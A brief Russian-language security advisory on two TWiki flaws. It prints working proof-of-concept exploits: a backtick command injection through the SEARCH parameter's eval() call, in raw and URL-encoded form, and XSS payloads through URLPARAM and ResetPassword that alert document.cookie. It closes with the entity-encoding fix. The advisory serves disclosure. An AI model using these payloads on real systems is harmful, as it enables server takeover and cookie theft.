Хакер #305. Многошаговые SQL-инъекции
Программа: TWiki
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные команды на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре SEARCH" перед использованием в вызове "eval()" . Удаленный
пользователь может выполнить произвольные команды на целевой системе.
Эксплоит:
%SEARCH{ date="P`pr -?`" search="xyzzy" }%
http://example.org/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all
2) Уязвимость существует из-за недостаточной обработки входных данных,
передаваемых в "URLPARAM" TWiki переменную. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
<input type="text" name="city" value="%URLPARAM{ "city" }%" />
http://example.com/twiki/view/TWiki/WebSearch?search=%27a%20onmouseover=alert(document.cookie)%20%27
http://example.com/twiki/view/TWiki/ResetPassword?username="<script language=Javascript>alert('3y3
0wn j00 TWIKI')</script>
<input type="text" name="city" value="%URLPARAM{ "city" encode="entity" }%" />